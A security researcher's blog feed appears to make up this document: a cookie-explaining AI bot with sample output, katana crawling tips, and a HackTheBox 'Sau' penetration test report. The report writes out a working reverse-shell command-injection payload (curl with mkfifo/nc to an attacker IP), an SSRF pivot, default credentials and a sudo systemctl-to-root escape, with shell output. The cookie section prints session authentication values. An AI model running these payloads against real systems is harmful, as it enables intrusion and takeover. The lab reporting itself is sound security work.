    • SeattleTech Innovations, Seattle, WA
    • January 2014 - Present
    • Developed and maintained multiple high-traffic web applications.
    • Led a team of 5 developers in agile project management.
    • Implemented new features and optimized existing code for better performance.
  • Software Developer
    • Tech Solutions, Bellevue, WA
    • June 2011 - December 2013
    • Worked on backend systems and API integrations.
    • Collaborated with front-end developers to ensure seamless user experiences.
    • Participated in code reviews and contributed to team knowledge sharing.

Skills

  • Programming Languages: Python, JavaScript, C++
  • Frameworks: Django, React, Node.js
  • Tools: Git, Docker, Jenkins
  • Soft Skills: Team Leadership, Problem Solving, Communication

Personal Interests

  • Reading mystery novels
  • Gardening
  • Coding and tech meetups

References

Available upon request.

Other Examples

I could go on for a while, it’s kinda fun in a nerdy, introverted sort of way. :D

Here are some other examples I’ve tried, but without the long output:

  • Atlanta, GA. trip.com - will produce personas who are interested in travel
  • etsy.com - crafters unite!
  • Kansas City, MO. minecraft.com - the other kind of crafters
  • male body builder
  • age 13, age 25, age 53, …- age specific personas with slang

I hope this makes your bug hunting or other testing more realistic and frees up some time.

]]>
AI Bot for Explaining Cookies2024-09-04T21:00:00+00:002024-09-04T21:00:00+00:00https://double16.github.io/l/2024/09/04/fabric-patterns-cookies-explainArtificial Intelligence (AI) gets a lot of attention. I was skeptical at first, but after using ChatGPT instead of DuckDuckGo, I was impressed. After asking for it to write some code for me, then I was really impressed. I recently watched Practical AI for Bounty Hunters. Wow.

Jason Haddix presented using fabric to produce AI bots for security research. Do watch the video. He is a good presenter and there is so much useful information you’ll likely watch it more than once.

I wrote an AI bot to explain the cookies used by a site. The code is available in my GitHub at https://github.com/double16/fabric. The examples are from public sites, no vulnerabilities are exposed, so this is legal and ethical.

When running the bot, check the last comment for recommended fabric arguments. It significantly affects the outcome.

trip.com

I was an authenticated user on trip.com when I saved the raw request and response using ZAP. The format is the same as Burp Suite. It includes all of the request and response headers and bodies. The bot is able to extract cookies from it.

$ cat trip.raw | fabric --pattern explain_cookies --temperature=.2 --presencepenalty=.2 --stream

The results were better than I expected!

  • UBT_VID: This cookie seems to be used for tracking user behavior on the website. The value 1724669840943.2043fLOxwGsP appears to be a unique identifier, possibly combining a timestamp with a random string for uniqueness.

  • ibu_online_jump_site_result: Stores JSON data indicating user preferences or actions related to site navigation. The value {"site_url":[],"suggestion":["en-us","","es-us"]} suggests it’s used to manage language or regional settings and suggestions.

  • ibulanguage and ibulocale: Both cookies (EN and en_us respectively) are straightforward, storing the user’s language and locale preferences, which help in customizing the user interface according to the user’s preferred language.

  • cookiePricesDisplayed: Stores the currency preference (USD) for displaying prices, ensuring that the user sees prices in their chosen currency consistently across the site.

  • _abtest_userid: Contains a UUID 6913d6ac-7bb1-4e89-ba0d-33858f62ac07, likely used to identify a user in A/B testing scenarios to deliver consistent experiment experiences.

  • _gid, _gcl_au, _ga, _ga_2DCSB93KS4, _ga_37RNVFDP1J, _ga_X437DZ73MR: These are Google Analytics cookies used to distinguish users and sessions for analytics purposes. The values are identifiers and timestamps related to user sessions and interactions.

  • _tt_enable_cookie and _ttp: Related to tracking technologies, possibly for advertising or user behavior tracking. The values 1 and o2HwmvRJ9YAEV4WeLYhEOgxmzD6 suggest an enabled state and a unique tracking ID.

  • _RSG, _RDG, _RGUID: Seem to be related to session or user identification with specific values like hpas6yHluMDYVCpjKpIO39 and d5b8bd1f-06da-4ceb-90d8-4b352dccc7e2 which could be used internally for maintaining user session states or logs.

  • GUID: 09034024316925335983 appears to be a globally unique identifier for the user or session, critical for linking back-end processes to the user.

  • login_type, login_uid, DUID: These cookies (0, B2E7EBBB91A228E959D2AE549E4265610FC51D2A7E3F2BBD187B34B46FE68E99C4288992DDE5C7C3369410D38AE6B9F4, u=6D6E7DE4CA24C7AD5F0E32C02BACD288C3473027A632936E861D6B4023D2505C&v=0) are highly sensitive as they relate to user authentication and device identification. Exposure of these values can lead to account takeover or identity theft.

  • _udl: Appears to be an encrypted or hashed value CC0F7EF1FB3BF3A3EA7122B403EF204C, possibly related to user login or session details, indicating a high confidentiality requirement.

  • _bfa, _bfi, _bfaStatusPVSend, _bfaStatus: These cookies are likely used for analytics or fraud detection, with values indicating various statuses and identifiers for tracking user interactions and behaviors.

The interaction between cookies like _ga, _gid, _gcl_au (all Google Analytics), and _abtest_userid suggests a comprehensive tracking system for user behavior analysis and site optimization based on user activities. The GUID and login-related cookies interact to maintain session integrity and secure user authentication processes.

Security Concerns

The most sensitive cookies here are login_uid, DUID, and _udl, which should be protected to prevent session hijacking and identity theft. The use of HTTPS is crucial to protect these cookies from being exposed during data transmission. Additionally, setting cookies with the HttpOnly and Secure flags would help mitigate the risk of client-side script access and ensure they are sent over secure channels, respectively. The exposure of these values can lead to significant security breaches, including unauthorized access to user accounts and personal data.

6sense.com

Let’s try another one, except using the HTTP Archive Format (HAR). It is a JSON format supported by many tools. Chrome and Firefox support saving this format from dev tools, as well as ZAP and Burp Suite.

$ cat 6sense-vdp.har | fabric --pattern explain_cookies --temperature=.2 --presencepenalty=.2  --stream
  • __cf_bm: This cookie is associated with Cloudflare and is used to distinguish between humans and bots. This is beneficial for the website, to make valid reports on the use of their site. It also contains a unique ID that Cloudflare uses to identify individual clients behind a shared IP address and apply security settings on a per-client basis.

  • __q_state_nev3mYP3YV7DaW2F: Appears to be a custom cookie used to store state information in a JSON encoded format. The value includes a UUID and a domain, suggesting it’s used for tracking user sessions or preferences across the domain “6sense.com”.

  • _fbp: This cookie is set by Facebook to deliver advertisement products such as real time bidding from third party advertisers. It contains identifiers for the browser and a unique visitor ID.

  • _ga: This Google Analytics cookie is used to distinguish unique users by assigning a randomly generated number as a client identifier. It is included in each page request in a site and used to calculate visitor, session and campaign data for the sites analytics reports.

  • _ga_311340212, _ga_JKCB2CTS3D, _ga_Q57CXMB28P: These are Google Analytics cookies used to manage user sessions. They typically contain timestamp details of when a visitor enters and leaves the website, along with session identifiers.

  • _gcl_au: Used by Google AdSense for experimenting with advertisement efficiency across websites using their services.

  • ketch_consent_v1: This cookie seems to be related to managing user consent for various services and tracking. The encoded value suggests detailed consent preferences for analytics, advertising, and functional services.

  • _mkto_trk: This cookie is associated with an email marketing service provided by Marketo. It tracks the visitor’s identity and behavior on the website to optimize the relevance of marketing campaigns.

  • _pf_id.c97b and _pf_ses.c97b: Likely used for tracking user behavior and session details. The complex structure suggests it includes timestamps, unique identifiers, and possibly session states.

  • swb** and **_swb_consent: These cookies seem to manage user consent settings for various tracking or functional services, possibly related to a web-based application or service.

  • _uetsid and _uetvid: These cookies are used by Microsoft Bing Ads and are used for tracking the success of advertising campaigns on Bing.

  • cf_clearance: This cookie is related to Cloudflare and is used to bypass security restrictions based on the visitor coming from a trusted IP address.

  • mutiny.user.session, mutiny.user.session_number, mutiny.user.token: These appear to be custom cookies used to manage user sessions and authentication tokens, likely for maintaining session state and security across page requests.

  • vid: Likely a unique visitor ID, used for tracking purposes to distinguish different visitors.

The interactions between these cookies are primarily focused on tracking, user identification, session management, and advertising. For instance, Google Analytics cookies (_ga, _ga_311340212, _ga_JKCB2CTS3D, _ga_Q57CXMB28P) work together to provide a comprehensive view of how users interact with the site over time. The _fbp and _gcl_au cookies interact by contributing data for advertising efficiency analytics. The mutiny.user.* cookies interact to maintain a secure and continuous user session.

Security Concerns

  1. Exposure of Session Tokens: Cookies like mutiny.user.token carry session tokens which, if exposed, could allow an attacker to hijack a user’s session.
  2. Third-Party Tracking: Cookies such as _fbp and Google Analytics cookies can track user behavior across different sites, which raises privacy concerns.
  3. Persistent Identifiers: Cookies like vid and _uetvid that serve as persistent identifiers can be used to track users over long periods, potentially infringing on privacy if not properly managed and disclosed.
  4. Encryption and Encoding: Values in cookies like _ketch_consent_v1_ are encoded, which is good for security. However, it’s crucial that sensitive information is not only encoded but encrypted to prevent unauthorized access.

It’s essential for users to be aware of these cookies, understand their purpose, and manage their consent preferences to protect their privacy and data integrity.

Conclusion

I could search all of these cookie names myself. At some point I will see enough of them to know by memory. The value add is that this bot is a single command and the output is great for pasting into notes. How much time would I spend searching, researching and assembling this myself? I will be certainly be using AI bots moving forward. I will be adding to https://github.com/double16/fabric as I develop more bots.

]]>
Crawling Large Sites2024-09-03T16:38:10+00:002024-09-03T16:38:10+00:00https://double16.github.io/l/2024/09/03/crawling-large-sitesI’ve been working on bug bounties and the tools I use for crawling HackTheBox machines do not scale well for large, public sites. These are a few things I’ve learned, and my methodology will improve as time goes on.

GUI Tools Choke

My go-to intercepting proxy is ZAP. I won’t give an exhaustive explanation of my choice, but mentioned a few things. ZAP performs passive scanning as a site is browsed or crawled (aka. spidered). There are a lot of useful alerts given by this. The requests and responses, including headers and bodies, can be searched for content. It would be advantageous to scan a large site. Burp Suite has similar features.

The issue is that crawling a large site can approach tens or hundreds of thousands of requests. Excluding out of scope domains from the proxy helps, but it isn’t enough. At this number of requests operations slow down to become unusable. Opening and closing the ZAP session is slow. I’ve also experienced where ZAP crashes or my VM crashes, it corrupts the session file. That is a lot of work lost.

Command Line

My solution is to not use ZAP or Burp Suite for crawling. I use these tools for manual work. Instead, I use the command line tool katana to crawl the entire site. The results are stored in JSON in a text file. Command line tools can be used to digest the data.

Passive Crawling

Passive crawling is using sites like The Wayback Machine to query historical URLs. The -passive argument enables this feature instead of crawling the site itself.

katana -u https://example.com -passive
  -omit-raw -omit-body
  -o katana-passive-example.com.json -jsonl
  -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0'

Crawling

katana -u https://example.com -js-crawl -jsluice -known-files all
  -field-scope fqdn -display-out-scope
  -form-extraction -ignore-query-params -strategy breadth-first
  -omit-raw -omit-body 
  -rate-limit 6
  -o katana-example.com.json -jsonl
  -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0' -retry 3

Headless Crawling

Headless crawling uses the Chromium browser to crawl the site. For dynamic web sites this may yield more results. The -headless argument enables this feature.

katana -u https://example.com -headless -js-crawl -jsluice -known-files all
  -field-scope fqdn -display-out-scope
  -form-extraction -ignore-query-params -strategy breadth-first
  -omit-raw -omit-body
  -rate-limit 6
  -depth 5 -retry 3
  -o katana-headless-example.com.json -jsonl

Argument Description

Read the katana docs to fully understand its options and behavior. These are the ones I’ve found useful so far.

Argument Description
-js-crawl Scans javascript for URLs.
-js-luice Uses the JSLuice library to extract more URLs.
-known-files all Look for robots.txt, sitemap.xml, etc.
-field-scope fqdn Don’t crawl outside of the fully qualified domain.
-display-out-scope Output links to out of scope URLs without accessing them.
-form-extraction Extract form data.
-ignore-query-params Ignore query params when determining if a URL has been visited. Keeps the scan from growing out of control.
-strategy breadth-first Most features of a site are identified by the first or second depth of the path. This option discovers these earlier.
-omit-raw Omit the raw request/response data, otherwise local files can grow large.
-omit-body Omit the raw request/response bodies, otherwise local files can grow large.
-rate limit 6 Limit to 6 requests per second. Attempts to prevent being blocked or overwhelming the site.
-o The output file
-jsonl JSON Line output, each line is a JSON document for a request and response.
-H Specifies an HTTP header, in this case a custom user agent.

Analyzing

The output is a JSON payload, one request/response per line, perfect for command line tools.

jq is the primary tool I use to extract fields. For example, to get a list of all visited URLs, one per line:

cat katana-example.com.json | jq -r .request.endpoint

To extract parts of the URL, use TomNomNom’s unfurl:

cat katana-example.com.json | jq -r .request.endpoint | unfurl paths

TomNomNom uses the command line at lot and has developed tools that will help in this approach. Check out his GitHub. Here’s a video I enjoyed watching his command line skills: NahamSec .

ZAP and Burp Suite both allow importing a text file of URLs. Once I have a set of URLs I want to investigate further, I import into ZAP.

Conclusion

When working with sites at large scale, I need to get creative instead of wasting time waiting for tools to run. ZAP has a command line mode and docker image that I plan to experiment with to see if I can get it to perform passive scans at scale.

]]>
HackTheBox Sau Report2024-06-12T00:00:00+00:002024-06-12T00:00:00+00:00https://double16.github.io/l/2024/06/12/hackthebox-lab-sauHackTheBox “Sau” Machine
Penetration Test Report

Patrick Double
[email protected]
https://www.linkedin.com/in/patrick-double-28b44149/

title: **Table of Contents**

Executive Summary

Purpose and Scope

“Sau is an Easy Difficulty Linux machine that features a Request Baskets instance …”

The goal was to identify security vulnerabilities within the machine, exploit the vulnerabilities to retrieve flags user.txt and root.txt, and identify mitigations.

Risks

Full System Compromise (High Impact)

A full system compromise provides a computer under attacker control in the network.

Modification of Sensitive Application

Maltrail is a malicious traffic detection system. An attacker could change configuration or disable the application such that malicious traffic is no longer detected.

Recommendations

This section gives general recommendations that will reduce the risk of the findings occurring in the future. Recommendations specific to each finding are detailed in the next section.

Regular Patching

A regular patching schedule should be maintained for all installed software.

Password Requirements

Strong password requirements should be enforced.

Vulnerability Scanning

Using a vulnerability scanner on deployment environments may find configuration errors, such as several of the HTTP cookie and header findings detailed below.

Findings

Finding ID CWE Risk/
Impact
Description
HTBSAU-2024-01 918 High/High CVE-2023-27163 SSRF in request-baskets
HTBSAU-2024-02 77 High/High MalTrail 0.53 Command Injection RCE
HTBSAU-2024-03 205 High/High CVE-2023-26604 Privilege Escalation
HTBSAU-2024-04 1392 HIgh/Medium MailTrail Default Credentials
HTBSAU-2024-05 352 Medium/Medium Missing CSRF Token
HTBSAU-2024-06 693 Medium/Medium CSP: Unsafe Configuration
HTBSAU-2024-07 693 Medium/Medium Missing Content Security Policy Header
HTBSAU-2024-08 345 Medium/Medium Sub Resource Integrity Attribute Missing
HTBSAU-2024-09 829 Medium/Medium Vulnerable JS Library: moment.js 2.10.6
HTBSAU-2024-10 1021 Low/Medium Missing Anti-clickjacking Header

HTBSAU-2024-01 CVE-2023-27163 SSRF in request-baskets

Observation

The request-baskets 1.2.1 application has a known vulnerability that the tester successfully exploited.

Affected Components

Description

“request-baskets up to v1.2.1 was discovered to contain a Server-Side Request Forgery (SSRF) via the component /api/baskets/{name}. This vulnerability allows attackers to access network resources and sensitive information via a crafted API request.”

The tester succeeded in gaining access to an internal web service running on the default HTTP port. Any HTTP service accessible to the sau.htb machine, including those not accessible to the public Internet, could be accessed using this vulnerability.

Mitigation

Upgrade request-baskets to a patched version.

Validation

Create a new basket and configure it to forward to http://localhost:80. Verify the MalTrail application is not available.

References

HTBSAU-2024-02 MalTrail 0.53 Command Injection RCE

Observation

The MalTrail application was exposed through the SSRF vulnerability described in HTBSAU-2024-01. MalTrail is running a vulnerable version of 0.53 that allows remote code execution (RCE) via command injection.

Affected Components

  • Web application on sau.htb running on http://localhost:80/

Description

“Command injection vulnerabilities typically occur when:

  1. Data enters the application from an untrusted source.
  2. The data is part of a string that is executed as a command by the application.
  3. By executing the command, the application gives an attacker a privilege or capability that the attacker would not otherwise have.”

The tester was able to execute arbitrary operating system commands leading to a reverse shell.

Mitigation

Upgrade MalTrail to a patched version.

Validation

  1. Configure a basket detailed in HTBSAU-2024-01
  2. On the attacking machine run nc -nlvp 9090
  3. On another shell on the attacking machine run, changing the bucket name and attacker IP address.
    curl 'http://sau.htb:55555/mfaos3m/login' --data 'username=;`rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>%25261|nc 10.10.14.87 9090 >/tmp/f`'
    
  4. A vulnerable version will connect back to the nc command
    $ nc -nlvp 9090
    listening on [any] 9090 ...
    connect to [10.10.14.87] from (UNKNOWN) [10.129.229.26] 56694
    /bin/sh: 0: can't access tty; job control turned off
    $
    

References

HTBSAU-2024-03 CVE-2023-26604 Privilege Escalation

Observation

The Ubuntu operating system on sau.htb is running an unpatched version. The version has vulnerability CVE-2023-26604 that affects system services run using sudo.

Affected Components

  • Ubuntu 20.04.6 LTS on sau.htb

Description

The puma user was compromised by HTBSAU-2024-02. This user is allowed to run the following command:

$ sudo /usr/bin/systemctl status trail.service

When the output needs to be paged, the less program is used. This program allows command execution, and it is running as the root user.

Mitigation

Upgrade Ubuntu to a patched version.

Validation

  1. Login as the puma user
  2. Execute the following commands:
    $ stty columns 200 rows 10
    $ sudo /usr/bin/systemctl status trail.service
    !sh
    
  3. On a vulnerable system, the !sh input to the less program will result in a shell
    !sh
    # id
    uid=0(root) gid=0(root) groups=0(root)
    #
    

References

HTBSAU-2024-04 MailTrail Default Credentials

Observation

The MalTrail application was exposed through the SSRF vulnerability described in HTBSAU-2024-01. It is configured with default credentials for the admin account.

Affected Components

  • Web application on sau.htb running on http://localhost:80/

Description

“It is common practice for products to be designed to use default keys, passwords, or other mechanisms for authentication. The rationale is to simplify the manufacturing process or the system administrator’s task of installation and deployment into an enterprise. However, if admins do not change the defaults, it is easier for attackers to bypass authentication quickly across multiple organizations.”

Mitigation

Change the password for the admin user as part of the install process. Create a password rotation policy to mitigate compromise of the password.

Validation

  1. Configure a basket detailed in HTBSAU-2024-01
  2. Open a web browser to the basket URL
  3. Enter the user admin and password changeme! and click Log In
  4. A vulnerable password will successfully login

References

HTBSAU-2024-05 Missing CSRF Token

Observation

The tester observed the web application on port 55555 does not use a CSRF (Cross-Site Request Forgery) token.

Affected Components

  • Web application on port 55555

Description

“When a web server is designed to receive a request from a client without any mechanism for verifying that it was intentionally sent, then it might be possible for an attacker to trick a client into making an unintentional request to the web server which will be treated as an authentic request. This can be done via a URL, image load, XMLHttpRequest, etc. and can result in exposure of data or unintended code execution.”

Mitigation

If the alert is present after upgrading request-baskets, contact the authors and request implementation of CSRF protection.

Validation

Use a web application scanner to detect the presence of CSRF protection. Use a web application proxy, such as ZAP, to intercept requests and modify the CSRF token. Proper implementation will fail to process the request if the CSRF is modified.

References

HTBSAU-2024-06 Content Security Policy: Unsafe Configuration

Observation

The request-baskets 1.2.1 software has an unsafe content security policy:

  • Wildcard Directive
  • script-src unsafe-eval
  • style-src unsafe-inline

Affected Components

  • Web application on port 55555

Description

Content Security Policy (CSP) is an added layer of security that helps to detect and mitigate certain types of attacks, including Cross-Site Scripting (XSS) and data injection attacks. These attacks are used for everything from data theft, to site defacement, to malware distribution.”

Mitigation

If the alert is present after upgrading request-baskets, contact the authors and request implementation of a more strict CSP.

Validation

Use a web application scanner to detect the unsafe configuration.

References

HTBSAU-2024-07 Missing Content Security Policy Header

Observation

The tester observed the web application does not provide a CSP (Content Security Policy) in some cases.

Affected Components

  • Web application on port 55555

Description

Content Security Policy (CSP) is an added layer of security that helps to detect and mitigate certain types of attacks, including Cross-Site Scripting (XSS) and data injection attacks. These attacks are used for everything from data theft, to site defacement, to malware distribution.”

Mitigation

If the alert is present after upgrading request-baskets, contact the authors and request including a proper CSP header for every request.

Validation

The Firefox dev tools can be used to inspect the response of requests to the applications. Look for the Content-Security-Policy HTTP headers.

References

HTBSAU-2024-08 Sub Resource Integrity Attribute Missing

Observation

Affected Components

  • Web application on port 55555

Description

Subresource Integrity (SRI) is a security feature that enables browsers to verify that resources they fetch (for example, from a CDN) are delivered without unexpected manipulation. It works by allowing you to provide a cryptographic hash that a fetched resource must match.”

Mitigation

If the alert is present after upgrading request-baskets, contact the authors and request use of sub-resource integrity attributes.

Validation

Use a web application scanner to detect missing sub-resource integrity attributes.

References

HTBSAU-2024-09 Vulnerable JS Library: moment.js 2.10.6

Observation

The client side dependency moment.js is a vulnerable version.

Affected Components

  • Web application on port 55555

Description

“When including third-party functionality, such as a web widget, library, or other source of functionality, the product must effectively trust that functionality. Without sufficient protection mechanisms, the functionality could be malicious in nature (either by coming from an untrusted source, being spoofed, or being modified in transit from a trusted source). The functionality might also contain its own weaknesses, or grant access to additional functionality and state information that should be kept private to the base system, such as system state information, sensitive application data, or the DOM of a web application.”

Mitigation

If the alert is present after upgrading request-baskets, contact the authors and request upgrading the moment.js dependency.

Validation

Use a web application scanner to detect vulnerable client side dependencies.

References

HTBSAU-2024-10 Missing Anti-clickjacking Header

Observation

The tester observed lack of HTTP headers mitigating click jacking attacks.

Affected Components

  • Web application on port 55555

Description

“Clickjacking (classified as a user interface redress attack or UI redressing) is a malicious technique of tricking a user into clicking on something different from what the user perceives, thus potentially revealing confidential information or allowing others to take control of their computer “

Mitigation

For the custom application on port 8080, implement a CSP including frame-ancestors or the X-Frame-Options header.

Validation

The Firefox dev tools can be used to inspect the response of requests to the applications. Look for the frame-ancestors value in the Content-Security-Policy HTTP header, or the X-Frame-Options header.

References

Methodology

The tester employed an industry recognized method for conducting penetration testing. Below is a detailed account of how the tester identified and exploited the target, including all individual vulnerabilities discovered.

Discovery

The IP address for this machine is 10.129.44.233. The typical host name for Hack the Box machines is the name of the machine and a TLD of htb. Add this to /etc/hosts as:

10.129.44.233 sau.htb

Service Enumeration

The tester enumerated network services using nmap.

$ nmap -p- -sV -sC -oN nmap-tcp-all.txt -oX nmap-tcp-all.xml 10.129.44.233

The interesting services are:

Port Service Product
22 ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.7
55555 http unknown

TCP 55555 HTTP

To prepare for enumerating the http endpoints, the tester started and configured ZAP to intercept and inspect traffic.

The web application is running request-baskets version 1.2.1.

The tester verified a new basket can be created.

Vulnerabilities

SSRF in request-baskets, CVE-2023-27163

By performing a search, the tester found a CVE in request-baskets version 1.2.1.

Configuring the basket to forward to http://localhost:80/ revealed the MalTrail login page.

Default Credentials

The tester searched for any default credentials for MalTrail and found admin:changeme!. The credentials worked. The forwarding interfered with optimal usage of the application.

MalTrail 0.53 RCE

A search for exploits for MalTrail 0.53 revealed a remote code execution exploit.

https://huntr.com/bounties/be3c5204-fbd9-448d-b97c-96a8d2941e87/

Exploitation

MalTrail 0.53 RCE

The bucket name mfaos3m will need to be changed to match the one created above.

$ nc -nlvp 9090

$ curl 'http://sau.htb:55555/mfaos3m/login' --data 'username=;`rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>%25261|nc 10.10.14.87 9090 >/tmp/f`'

$ nc -nlvp 9090
listening on [any] 9090 ...
connect to [10.10.14.87] from (UNKNOWN) [10.129.229.26] 56694
/bin/sh: 0: can't access tty; job control turned off
$

The user.txt file is found in this user’s home directory.

$ whoami
puma
$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:b0:a0:f6 brd ff:ff:ff:ff:ff:ff
    inet 10.129.229.26/16 brd 10.129.255.255 scope global dynamic eth0
       valid_lft 2299sec preferred_lft 2299sec
    inet6 dead:beef::250:56ff:feb0:a0f6/64 scope global dynamic mngtmpaddr 
       valid_lft 86394sec preferred_lft 14394sec
    inet6 fe80::250:56ff:feb0:a0f6/64 scope link 
       valid_lft forever preferred_lft forever
$ hostname
sau
$ cd
$ pwd
/home/puma
$ ls
user.txt

Discovery of [email protected]

The tester stabilized the shell for easier discovery.

$ python3 -c 'import pty; pty.spawn("/bin/bash")'
puma@sau:~$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/tmp
<l/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/tmp
puma@sau:~$ export TERM=xterm-256color
export TERM=xterm-256color
puma@sau:~$ ^Z
zsh: suspended  nc -nlvp 9090

┌──(kali㉿kali)-[~/…/Assessments/hackthebox/pwned.d/Sau]
└─$ stty raw -echo ; fg ; reset
[1]  + continued  nc -nlvp 9090
stty columns 200 rows 200
puma@sau:~$

The operating system is Ubuntu 20.04.6.

puma@sau:~$ cat /etc/*release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=20.04
DISTRIB_CODENAME=focal
DISTRIB_DESCRIPTION="Ubuntu 20.04.6 LTS"

The puma user has sudo permissions:

puma@sau:~$ sudo -l
Matching Defaults entries for puma on sau:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User puma may run the following commands on sau:
    (ALL : ALL) NOPASSWD: /usr/bin/systemctl status trail.service

Vulnerabilities

https://ubuntu.com/security/cves

CVE-2023-26604

https://ubuntu.com/security/CVE-2023-26604

Exploitation of systemctl

# id
uid=0(root) gid=0(root) groups=0(root)
# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:b0:a0:f6 brd ff:ff:ff:ff:ff:ff
    inet 10.129.229.26/16 brd 10.129.255.255 scope global dynamic eth0
       valid_lft 2323sec preferred_lft 2323sec
    inet6 dead:beef::250:56ff:feb0:a0f6/64 scope global dynamic mngtmpaddr 
       valid_lft 86395sec preferred_lft 14395sec
    inet6 fe80::250:56ff:feb0:a0f6/64 scope link 
       valid_lft forever preferred_lft forever
# hostname
sau
# cd
# ls
go  root.txt
#

Appendix

Tool Versions

Tool Version Source
Kali Linux 2024.2 https://www.kali.org/get-kali/
Firefox 115.12.0esr Kali package manager
ZAP Weekly 2024-06-17 https://www.zaproxy.org/download/
nmap 7.94SVN Kali package manager
curl 8.8.0 Kali package manager
netcat v1.10-48.1 Kali package manager
]]>